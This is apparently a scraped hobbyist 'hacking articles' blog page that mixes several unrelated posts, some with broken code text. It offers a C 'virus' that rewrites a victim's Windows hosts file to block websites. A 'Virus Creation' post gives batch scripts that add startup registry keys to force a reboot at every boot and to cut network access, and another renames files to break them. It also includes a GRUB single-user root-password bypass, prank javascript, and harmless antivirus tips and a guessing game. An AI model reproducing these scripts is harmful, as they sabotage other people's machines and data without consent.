Paid To Popup Hacking Articles

A Virus program to block websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post


Here is the sourcecode of the virus
.
#include
#include
#include
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

How to Compile ?
compile the program.


Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1—————————google.com
5. Delete all such entries which contain the names of blocked sites.

So Enjoy The Hack.....

How to reset Linux forgotten root password

Too forgetful or too much security enforcements that have caused you to lost a Linux root password, as most of the time you’re forced to use sudo command for daily admin tasks?

Don’t be so much worry or regret, as you might able to easily reset a Linux lost password in a short while!
I’ve personally tested this Linux trick in Red Hat Linux 9 default installation environment. So, I believe the same trick can be applied on most Linux distribution as well.
A step-by-step Linux password hacking trick – How to reset Linux forgotten root password?

Reboot the Linux machine by pressing the hardware reset button. In a default Linux installation, pressing CTRL + ALT + DEL hotkey might able to reboot Linux immediately too.

Upon Linux booting up to GRUB loader GUI, move the arrow key up/down to highlight and select the Linux kernel and press e to edit the GRUB commands before booting:

A visual step-by-step Linux guide to reset forgotten root password.

Next, move the arrow key up/down to select the Linux kernel and press e again:

A visual step-by-step Linux guide to reset forgotten root password.

Append a single space followed by the word single at the end of edited line, as shown in this snapshot:

A visual step-by-step Linux guide to reset forgotten root password.

After pressing ENTER key, you should now have a similar GRUB screenshot as of follow. Keep the Linux kernel highlighted and press b to boot up with the “single” keyword, which will boot Linux into single user maintenance mode:

A visual step-by-step Linux guide to reset forgotten root password.

Once the Linux boot up completely into single user maintenance mode, the Linux command prompt is ready to execute command. Now, you can type passwd to reset the forgotten root password – without prompting for old root password, just type a new root password and re-type to confirm:

A visual step-by-step Linux guide to reset forgotten root password.

Done. Type reboot or exit to reboot. On next boot up, you can login with the new root password!
So, isn’t it easy to hack or reset a forgotten root password in Linux? Yes, this Linux trick works well on Red Hat Linux Enterprise Linux 4 too. However, bear in mind that the trick will only valid for a default Linux installation or without strengthening Linux security!

So Enjoy The Hack....
Play Game On the Net – FREE online games

Why antivirus is dead and 5 ways to protect your computer today

I’m going to get straight to the point here. Anti-virus is dead. 
 
Well, maybe I shouldn’t say dead, because there are still some people that use it. Back in the early 2000’s, almost everyone had anti-virus software, and viruses and trojans were as plentiful as dandelions. However it seems now that mostly everyone who is at all tech-savvy are turning away from anti-virus, which leaves the demographic mostly to people who are confused and misinformed.


Don’t get me wrong, doing a quick scan once a week is a great idea, but running active-scanning software such as Norton on your computer 24/7 just decreases computer performance. Moreover, wouldn’t it make more sense to try to prevent getting viruses in the first place, instead of just trying to catch them before they do damage? Because we all know that some viruses can bypass or disable your AV software, until you download the latest patch. So what do you do when your anti-virus misses something? Well, you’re pretty much screwed. For anyone who has any computer knowledge, here are some great ways to protect your computer more efficiently, more effectively, and less costly than standard AV software.


1. Use a firewall. Firewalls are virtual defenses around your computer that monitor and regulate what can or cannot access the internet from your computer, and vice versa. You will have to grant access to all your standard programs, but after that, your firewall will not bug you unless it notices something new attempting to access the internet. Which means if you ever get a virus that tries to send out your private information, or call to other viruses to join the party, they will run straight into a brick- I mean firewall. A great free firewall program is ZoneAlarm Free. ZoneAlarm comes packed with great features, one of them being an “Internet Off” button, that you can press to bring your computer into lock-down mode if you suspect a virus is lurking about.


2. Use safe download sites. When possible, download your software from a spyware and virus-free site such as Download.com Softpedia, or FileHippo. Avoid downloading files from P2P programs, or shady download sites such as www.123easyfreeware.cz. Even downloading software from the developer’s site could be dangerous.



3. Look for obvious signs of a virus. Be careful when running all exe files, especially setup.exe, which viruses are notorious for disguising themselves as. Verify file sizes as well. If you download any program, it will likely be multi-megabytes in size. Opening an exe with 500kb is very risky.

4. When in doubt, Sandbox it! Sandboxie is a great tool that lets you run any files in a virtual hard-drive which is completely quarantined from your regular files. So if the file is a virus, or something bad happens, you can simply delete the sandbox, and it is like nothing ever happened.


5. Regularly create disk images of your HD. Using paid software such as Acronis TrueImage or Norton Ghost, you can easily create “image” files of your hard drive, which allows you to restore your entire drive easily in the event of a fatal virus or bug. This saves countless hours in the event of having to reformat your computer, but it is quite costly, requiring you to buy the software and also an external backup drive to store the images.


6. Run regular malware scans. Monthly, or preferably weekly, you should run an AV scan, spyware scan, and disk cleaner scan. This is vital to keeping your system in tip-top shape. I recommend using Spybot S&D, as well as CCleaner along with your AV scanner of choice.

Guessing Game in C


This is a small guessing game written in C.In this guessing game you have to guess a number between 0 & 100.You have 8 chances to do that.Every time you guess wrongly the program will give you a hint that your guess is too high or your guess is too low.Based on this hint you have to guess the number in the remaining attempts.Here’s the code
 
#include
#include
#include
void main()
{
int num,guess=-1,tries=0,pass=0;
time_t t;
srand((unsigned)time(&t));
num=rand()%100;
while((guess!=num)&&tries<8)
{
printf(“Enter the guess num b/w 0 & 100 (you have %d tries left out)\n”,(8-tries)); scanf(“%d”,&guess);
tries++;
if(guess==num)
{
printf(“Hurray you guessed it correctly!!!\n”);
pass=1;
}
else if(num< guess)
printf(“Your guess is too high\n”);
else
printf(“Your guess is too low\n”);
}
if(pass==0)
printf(“Sorry you lost! The correct number is %d\n”,num);
}

So Enjoy The Hack.....

Virus Creation (Part-2)


(1)Shutdown computer everytime it is turned on
(save as hshutdown.bat)

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


(2)Disable internet permanently
(save as hinternet.bat)

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE


(3)Change files to non-working TXT files
(save as txt.bat)

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
 

Prank Orkut & Facebook Hack Tricks


Howdy,In this post I will show you how to make your friend fool using some cool javascripts.Let we started with Prank Orkut Hack

Script To Hack Orkut


Alright this is not what you think it is just a prank to play with your friends, just pass them the followint javascript and what they will see is just a message that their account is being hacked, Old trick but always work for a good laugh.
Tell your friends to do the following only, you can yourself also try, as i said this is not a hacking script.

  1. Paste the following script in the Address Bar (Address Bar is where you type website addresses)
  2. and press enter thats it.
javascript:function reverse() { var inp = "  hsetih yb dekcah si tnuocca tukro ruoy  "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse();

Script To Hack FaceBook


Alright this is not what you think it is just a prank to play with your friends, just pass them the followint javascript and what they will see is just a message that their account is being hacked, Old trick but always work for a good laugh.
Tell your friends to do the following only, you can yourself also try, as i said this is not a hacking script.

  1. Paste the following script in the Address Bar (Address Bar is where you type website addresses)
  2. and press enter thats it.
javascript:function reverse() { var inp = "  hsetih yb dekcah si tnuocca koobecaf ruoy  "; var outp="";for (i = 0; i <= inp.length; i++) { outp =inp.charAt (i) + outp;}alert(outp) ;}; reverse(); 

So Enjoy The Hack...
If you like this post, Please Comment about it...